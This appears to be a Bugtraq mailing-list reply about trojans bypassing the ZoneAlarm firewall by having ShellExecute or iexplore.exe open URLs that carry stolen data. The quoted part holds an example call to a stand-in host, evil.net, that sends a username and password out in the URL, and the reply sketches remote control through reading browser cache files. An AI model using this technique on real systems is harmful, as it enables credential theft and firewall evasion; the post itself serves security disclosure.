While I was being interviewed for an InfoSecurityMag.com article on this (in which the author unfortunately got multiple fundamental facts wrong), I thought of a couple of other points that are probably worth mentioning. <aceh@gyuvetch.bg> writes: > Windows dll shell32.dll exports a well known and documented function called > ShellExecute. From Win32 Programmer's refference: > > >HINSTANCE ShellExecute( > > HWND hwnd, // handle to parent window > > LPCTSTR lpOperation, // pointer to string that specifies > > // operation to perform > > LPCTSTR lpFile, // pointer to filename or folder name string > > LPCTSTR lpParameters, // pointer to string that specifies > > //executable-file parameters > > LPCTSTR lpDirectory, // pointer to string that specifies default > directory > > INT nShowCmd // whether file is shown when opened > > ); > > When the lpFile parameter is an Internet url, windows invokes Internet > Explorer (or more accurately - the default web browser), which in 99% of > the cases is allowed to access Internet, with that url. Example: > > ShellExecute( > 0, > "open", > "http://evil.net/collect.cgiun=stolen_username&pw=stollen_password"; > 0, > 0, > SW_HIDE //This doesn't work. > //I think it is supposed to hide the window but ... > ); The level of detail you're going into on ShellExecute() kind of implies the vulnerability is limited to that one system call, but of course a malicious executable could directly run iexplore.exe or any other executable that allows opening arbitrary URLs, and pass those URLs via the commandline or via other means like DDE. > The info leaked is limited by the maximum allowed url length, but that > could be more than enough for a malicious application to send some > username/password/cookie/cc_number info to malicious server. And the vulnerability wouldn't be limited to simplex communications from host to server. The trojan could employ techniques (as simple as reading Internet Explorer cache files) to establish half-duplex communications, potentially allowing an attacker to gain remote control over your machine despite the presence of ZoneAlarm. Of course if a trojan is able to run arbitrary commands with your user privileges (especially if you're in the Administrators group, as, for instance, the initial account created on Windows XP boxes is), there are other ways an attacker could gain control of your machine. Particularly if you're running only ZoneAlarm rather than ZoneAlarm Plus or Pro, since it doesn't notice DLLs getting changed. -- Dan Harkless bugtraq@harkless.org http://harkless.org/dan/
